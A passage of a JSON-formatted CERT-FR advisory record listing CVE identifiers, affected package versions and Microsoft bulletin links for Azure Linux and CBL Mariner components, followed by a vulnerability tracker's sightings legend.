"scada": false
}
}
},
{
"description": "azl3 nginx 1.28.2-1 versions ant\u00e9rieures \u00e0 1.28.3-1",
"product": {
"name": "Azure Linux",
"vendor": {
"name": "Microsoft",
"scada": false
}
}
},
{
"description": "cbl2 ncurses 6.4-3 versions ant\u00e9rieures \u00e0 6.4-4",
"product": {
"name": "CBL Mariner",
"vendor": {
"name": "Microsoft",
"scada": false
}
}
},
{
"description": "azl3 kernel 6.6.126.1-1 versions ant\u00e9rieures \u00e0 6.6.130.1-1",
"product": {
"name": "Azure Linux",
"vendor": {
"name": "Microsoft",
"scada": false
}
}
},
{
"description": "azl3 ncurses 6.4-2 versions ant\u00e9rieures \u00e0 6.4-3",
"product": {
"name": "Azure Linux",
"vendor": {
"name": "Microsoft",
"scada": false
}
}
},
{
"description": "cbl2 terraform 1.3.2-29 versions ant\u00e9rieures \u00e0 1.3.2-30",
"product": {
"name": "CBL Mariner",
"vendor": {
"name": "Microsoft",
"scada": false
}
}
},
{
"description": "azl3 libsoup 3.4.4-12 versions ant\u00e9rieures \u00e0 3.4.4-14",
"product": {
"name": "Azure Linux",
"vendor": {
"name": "Microsoft",
"scada": false
}
}
},
{
"description": "azl3 etcd 3.5.21-1 versions ant\u00e9rieures \u00e0 3.5.28-1",
"product": {
"name": "Azure Linux",
"vendor": {
"name": "Microsoft",
"scada": false
}
}
}
],
"affected_systems_content": "",
"content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
"cves": [
{
"name": "CVE-2026-23318",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23318"
},
{
"name": "CVE-2026-23368",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23368"
},
{
"name": "CVE-2026-23281",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23281"
},
{
"name": "CVE-2026-32647",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-32647"
},
{
"name": "CVE-2026-23269",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23269"
},
{
"name": "CVE-2026-23293",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23293"
},
{
"name": "CVE-2026-23290",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23290"
},
{
"name": "CVE-2026-27651",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27651"
},
{
"name": "CVE-2026-23303",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23303"
},
{
"name": "CVE-2026-27654",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27654"
},
{
"name": "CVE-2026-23340",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23340"
},
{
"name": "CVE-2026-23253",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23253"
},
{
"name": "CVE-2026-33343",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-33343"
},
{
"name": "CVE-2026-23271",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23271"
},
{
"name": "CVE-2026-23268",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23268"
},
{
"name": "CVE-2026-23285",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23285"
},
{
"name": "CVE-2026-23304",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23304"
},
{
"name": "CVE-2026-23357",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23357"
},
{
"name": "CVE-2026-4645",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-4645"
},
{
"name": "CVE-2026-23324",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23324"
},
{
"name": "CVE-2026-23347",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23347"
},
{
"name": "CVE-2026-28755",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-28755"
},
{
"name": "CVE-2026-23317",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23317"
},
{
"name": "CVE-2026-23334",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23334"
},
{
"name": "CVE-2026-23391",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23391"
},
{
"name": "CVE-2026-23319",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23319"
},
{
"name": "CVE-2026-23279",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23279"
},
{
"name": "CVE-2026-23244",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23244"
},
{
"name": "CVE-2026-23246",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23246"
},
{
"name": "CVE-2026-30922",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-30922"
},
{
"name": "CVE-2026-23286",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23286"
},
{
"name": "CVE-2026-23359",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23359"
},
{
"name": "CVE-2026-23298",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23298"
},
{
"name": "CVE-2026-23296",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23296"
},
{
"name": "CVE-2026-23396",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23396"
},
{
"name": "CVE-2026-23370",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23370"
},
{
"name": "CVE-2026-23315",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23315"
},
{
"name": "CVE-2026-23352",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23352"
},
{
"name": "CVE-2026-23367",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23367"
},
{
"name": "CVE-2026-32748",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-32748"
},
{
"name": "CVE-2026-23300",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23300"
},
{
"name": "CVE-2026-23379",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23379"
},
{
"name": "CVE-2026-23381",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23381"
},
{
"name": "CVE-2026-23392",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23392"
},
{
"name": "CVE-2026-23245",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23245"
},
{
"name": "CVE-2026-4438",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-4438"
},
{
"name": "CVE-2026-23364",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23364"
},
{
"name": "CVE-2026-23274",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23274"
},
{
"name": "CVE-2026-23284",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23284"
},
{
"name": "CVE-2026-23397",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23397"
},
{
"name": "CVE-2026-23343",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23343"
},
{
"name": "CVE-2026-23336",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23336"
},
{
"name": "CVE-2025-69720",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-69720"
},
{
"name": "CVE-2026-23289",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23289"
},
{
"name": "CVE-2026-23292",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23292"
},
{
"name": "CVE-2026-23277",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23277"
},
{
"name": "CVE-2026-4437",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-4437"
},
{
"name": "CVE-2026-27784",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27784"
},
{
"name": "CVE-2026-23388",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23388"
},
{
"name": "CVE-2026-28753",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-28753"
},
{
"name": "CVE-2026-33526",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-33526"
},
{
"name": "CVE-2026-23310",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23310"
},
{
"name": "CVE-2026-2369",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-2369"
},
{
"name": "CVE-2026-33515",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-33515"
},
{
"name": "CVE-2026-23395",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23395"
},
{
"name": "CVE-2026-23100",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23100"
},
{
"name": "CVE-2026-23306",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23306"
},
{
"name": "CVE-2026-33413",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-33413"
},
{
"name": "CVE-2026-23291",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23291"
},
{
"name": "CVE-2026-23382",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23382"
},
{
"name": "CVE-2026-23312",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23312"
},
{
"name": "CVE-2026-23365",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23365"
},
{
"name": "CVE-2026-23356",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23356"
},
{
"name": "CVE-2026-23307",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23307"
},
{
"name": "CVE-2026-23398",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23398"
},
{
"name": "CVE-2026-23351",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23351"
},
{
"name": "CVE-2026-23390",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23390"
}
],
"initial_release_date": "2026-03-30T00:00:00",
"last_revision_date": "2026-03-30T00:00:00",
"links": [],
"reference": "CERTFR-2026-AVI-0376",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2026-03-30T00:00:00.000000"
}
],
"risks": [
{
"description": "Non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans les produits Microsoft. Elles permettent \u00e0 un attaquant de provoquer un probl\u00e8me de s\u00e9curit\u00e9 non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur.",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits Microsoft",
"vendor_advisories": [
{
"published_at": "2026-03-27",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-32748",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32748"
},
{
"published_at": "2026-03-22",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-4438",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-4438"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23347",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23347"
},
{
"published_at": "2026-03-20",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23268",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23268"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23392",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23392"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23319",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23319"
},
{
"published_at": "2026-03-20",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23253",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23253"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23296",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23296"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23364",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23364"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23368",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23368"
},
{
"published_at": "2026-03-27",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-27654",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-27654"
},
{
"published_at": "2026-03-21",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-30922",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-30922"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23286",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23286"
},
{
"published_at": "2026-03-27",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23396",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23396"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23340",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23340"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23324",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23324"
},
{
"published_at": "2026-03-27",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-33515",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33515"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23318",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23318"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23379",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23379"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23317",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23317"
},
{
"published_at": "2026-03-27",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-27784",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-27784"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23359",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23359"
},
{
"published_at": "2026-03-19",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23245",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23245"
},
{
"published_at": "2026-03-20",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23269",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23269"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23298",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23298"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23304",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23304"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23370",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23370"
},
{
"published_at": "2026-03-22",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23100",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23100"
},
{
"published_at": "2026-03-21",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23271",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23271"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23352",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23352"
},
{
"published_at": "2026-03-28",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-33343",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33343"
},
{
"published_at": "2026-03-22",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-4437",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-4437"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23343",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23343"
},
{
"published_at": "2026-03-28",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-33413",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33413"
},
{
"published_at": "2026-03-19",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23246",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23246"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23279",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23279"
},
{
"published_at": "2026-03-19",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23244",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23244"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23367",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23367"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23307",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23307"
},
{
"published_at": "2026-03-27",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23398",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23398"
},
{
"published_at": "2026-03-25",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2025-69720",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-69720"
},
{
"published_at": "2026-03-27",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-28755",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-28755"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23300",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23300"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23381",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23381"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23356",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23356"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23351",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23351"
},
{
"published_at": "2026-03-21",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23277",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23277"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23315",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23315"
},
{
"published_at": "2026-03-27",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-4645",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-4645"
},
{
"published_at": "2026-03-27",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-33526",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33526"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23382",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23382"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23310",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23310"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23306",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23306"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23336",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23336"
},
{
"published_at": "2026-03-25",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-2369",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-2369"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23391",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23391"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23290",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23290"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23312",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23312"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23388",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23388"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23390",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23390"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23303",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23303"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23289",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23289"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23293",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23293"
},
{
"published_at": "2026-03-27",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-27651",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-27651"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23291",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23291"
},
{
"published_at": "2026-03-27",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-28753",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-28753"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23334",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23334"
},
{
"published_at": "2026-03-27",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-32647",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32647"
},
{
"published_at": "2026-03-27",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23397",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23397"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23281",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23281"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23365",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23365"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23285",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23285"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23292",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23292"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23284",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23284"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23395",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23395"
},
{
"published_at": "2026-03-21",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23274",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23274"
},
{
"published_at": "2026-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2026-23357",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23357"
}
]
}
Loading…
Show additional events:
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…